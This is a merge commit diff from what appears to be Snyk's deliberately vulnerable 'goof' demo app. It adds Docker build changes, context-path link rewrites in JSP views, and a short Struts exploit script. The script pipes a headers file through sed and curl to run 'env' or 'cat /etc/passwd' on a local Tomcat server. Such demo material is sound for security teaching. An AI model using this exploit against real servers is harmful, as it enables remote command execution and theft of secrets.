Merge pull request #333 from snyk/docker-tomcat

Docker tomcat

Dockerfile

@@ -10,3 +10,5 @@ FROM tomcat:8.5.21
 RUN mkdir /tmp/extracted_files
 COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
 COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.war
+COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
+COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar

docker-compose.yml

@@ -1,6 +1,7 @@
 version: "2"
 services:
   javagoof:
+    build: .
     image: javagoof:orig
     container_name: javagoof
     environment:

exploits/struts-exploit-docker-tomcat.sh

@@ -0,0 +1,4 @@
+# Struts exploit using curl and httpie (more colourful HTTP client)
+# (runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
+cat struts-exploit-headers.txt| sed "s/COMMAND/env/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H
+cat struts-exploit-headers.txt| sed "s/COMMAND/cat \/etc\/passwd/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H

todolist-web-struts/src/main/webapp/WEB-INF/views/common/header.jspf

@@ -3,13 +3,13 @@
 <head>
 
 <meta http-equiv="content-type" content="text/html; charset=utf-8" />
-<link rel="shortcut icon" href="/static/img/todolist.ico"/>
+<link rel="shortcut icon" href=<%= response.encodeURL(request.getContextPath() + "/static/img/todolist.ico") %>/>
 
 <title>Todolist MVC</title>
 
 <!-- Le styles -->
-<link href="/static/css/bootstrap.min.css" rel="stylesheet">
-<link href="/static/css/datepicker.css" rel="stylesheet">
+<link href=<%= response.encodeURL(request.getContextPath() + "/static/css/bootstrap.min.css") %> rel="stylesheet">
+<link href=<%= response.encodeURL(request.getContextPath() + "/static/css/datepicker.css") %> rel="stylesheet">
 <style type="text/css">
     body {
         padding-top: 60px;
@@ -18,9 +18,9 @@
 </style>
 
 <!-- Le javascript -->
-<script src="/static/js/jquery-1.10.2.min.js" type="text/javascript"></script>
-<script src="/static/js/bootstrap.min.js" type="text/javascript"></script>
-<script src="/static/js/bootstrap-datepicker.js" type="text/javascript"></script>
+<script src=<%= response.encodeURL(request.getContextPath() + "/static/js/jquery-1.10.2.min.js") %> type="text/javascript"></script>
+<script src=<%= response.encodeURL(request.getContextPath() + "/static/js/bootstrap.min.js") %> type="text/javascript"></script>
+<script src=<%= response.encodeURL(request.getContextPath() + "/static/js/bootstrap-datepicker.js") %> type="text/javascript"></script>
 
 </head>
 

todolist-web-struts/src/main/webapp/WEB-INF/views/common/navigationbar.jspf

@@ -5,31 +5,31 @@
 <div class="navbar navbar-fixed-top">
     <div class="navbar-inner">
         <div class="container">
-            <a class="brand" href="/index">Todolist MVC</a>
+            <a class="brand" href=<%= response.encodeURL(request.getContextPath() + "/index") %>>Todolist MVC</a>
 
             <%--logged in mode --%>
             <c:if test="${sessionScope.user != null}">
             <ul class="nav">
-                <li class="${requestScope.homeTabStyle}"><a href="/user/home">Home</a></li>
-                <li class="${requestScope.aboutTabStyle}"><a href="/about">About</a></li>
+                <li class="${requestScope.homeTabStyle}"><a href=<%= response.encodeURL(request.getContextPath() + "/user/home") %>>Home</a></li>
+                <li class="${requestScope.aboutTabStyle}"><a href=<%= response.encodeURL(request.getContextPath() + "/about") %>>About</a></li>
             </ul>
             <div class="btn-group pull-right">
                 <a class="btn dropdown-toggle" data-toggle="dropdown" href="#">
                     <i class="icon-user"></i> Hi ${sessionScope.user.name} ! <span class="caret"></span>
                 </a>
                 <ul class="dropdown-menu">
-                    <li><a href="/user/account">My account</a></li>
+                    <li><a href=<%= response.encodeURL(request.getContextPath() + "/user/account") %>>My account</a></li>
                     <li class="divider"></li>
-                    <li><a href="/user/logout">Sign out</a></li>
+                    <li><a href=<%= response.encodeURL(request.getContextPath() + "/user/logout") %>>Sign out</a></li>
                 </ul>
             </div>
             </c:if>
 
             <%--not logged in mode --%>
             <c:if test="${sessionScope.user == null}">
             <ul class="nav pull-right">
-                <li class="${requestScope.registerTabStyle}"><a href="/register">Register</a></li>
-                <li class="${requestScope.loginTabStyle}"><a href="/login">Login</a></li>
+                <li class="${requestScope.registerTabStyle}"><a href=<%= response.encodeURL(request.getContextPath() + "/register") %>>Register</a></li>
+                <li class="${requestScope.loginTabStyle}"><a href=<%= response.encodeURL(request.getContextPath() + "/login") %>>Login</a></li>
             </ul>
             </c:if>
 

todolist-web-struts/src/main/webapp/WEB-INF/views/common/sidebar.jspf

@@ -6,11 +6,11 @@
 <div class="well sidebar-nav">
     <ul class="nav nav-list">
         <li class="nav-header">Hi ${sessionScope.user.name} !</li>
-        <li><a href="/user/home"><i class="icon-home"></i> Home</a></li>
-        <li><a href="/user/account"><i class="icon-user"></i> My account</a></li>
-        <li><a href="/todo/new"><i class="icon-file"></i> Create a todo</a></li>
-        <li><a href="/todo/upload"><i class="icon-file"></i> Upload Files</a></li>
-        <li><a href="/user/files"><i class="icon-file"></i> My Files</a></li>
+        <li><a href=<%= response.encodeURL(request.getContextPath() + "/user/home") %>><i class="icon-home"></i> Home</a></li>
+        <li><a href=<%= response.encodeURL(request.getContextPath() + "/user/account") %>><i class="icon-user"></i> My account</a></li>
+        <li><a href=<%= response.encodeURL(request.getContextPath() + "/todo/new") %>><i class="icon-file"></i> Create a todo</a></li>
+        <li><a href=<%= response.encodeURL(request.getContextPath() + "/todo/upload") %>><i class="icon-file"></i> Upload Files</a></li>
+        <li><a href=<%= response.encodeURL(request.getContextPath() + "/user/files") %>><i class="icon-file"></i> My Files</a></li>
         <li class="divider"></li>
         <li class="nav-header">Search todo</li>
         <li>

todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp

@@ -22,20 +22,20 @@
 
                     <c:if test="${sessionScope.user == null}">
                     <p>
-                        <a class="btn btn-primary btn-large" href="/login"> Sign in </a> or <a class="btn btn-primary btn-large" href="/register"> Sign up </a>
+                        <a class="btn btn-primary btn-large" href="<%= response.encodeURL(request.getContextPath() + "/login") %>"> Sign in </a> or <a class="btn btn-primary btn-large" href=<%= response.encodeURL(request.getContextPath() + "/register") %>"> Sign up </a>
                     </p>
                     </c:if>
 
                     <c:if test="${sessionScope.user != null}">
                         <p>
-                            <a class="btn btn-primary btn-large" href="/user/home"> Go to my Home page </a>
+                            <a class="btn btn-primary btn-large" href="<%= response.encodeURL(request.getContextPath() + "/user/home") %>"> Go to my Home page </a>
                         </p>
                     </c:if>
 
                 </div>
 
                 <div class="span5">
-                    <img src="/static/img/todolist.jpg" alt="todolist">
+                    <img src="<%= response.encodeURL(request.getContextPath() + "/static/img/todolist.jpg") %>" alt="todolist">
                 </div>
 
             </div>

todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp

@@ -38,7 +38,7 @@
                             <td><i class="icon-circle-arrow-<tl:priorityIcon priority="${currentTodo.priority}"/>"></i> ${currentTodo.priority}</td>
                             <td><span class="label <tl:statusStyle status="${currentTodo.done}"/> "> <tl:statusLabel status="${currentTodo.done}"/></span></td>
                             <td>
-                                <a class="btn btn-mini btn-primary" href="/todo/update?todoId=${currentTodo.id}"><i class="icon-edit icon-white"></i> Edit</a>
+                                <a class="btn btn-mini btn-primary" href=<%= response.encodeURL(request.getContextPath() + "/todo/update?todoId=${currentTodo.id}") %>><i class="icon-edit icon-white"></i> Edit</a>
                                 <a class="btn btn-mini btn-danger" data-toggle="modal" href="#confirm_delete_${currentTodo.id}"><i class="icon-remove icon-white"></i> Delete</a>
                                 <div class="modal hide" id="confirm_delete_${currentTodo.id}">
                                     <div class="modal-header">

todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp

@@ -38,7 +38,7 @@
                     </div>
 
                     <div align="center">
-                        You don't have an account yet? <a href="/register">Register here for free!</a>
+                        You don't have an account yet? <a href=<%= response.encodeURL(request.getContextPath() + "/register") %>>Register here for free!</a>
                     </div>
 
                 </fieldset>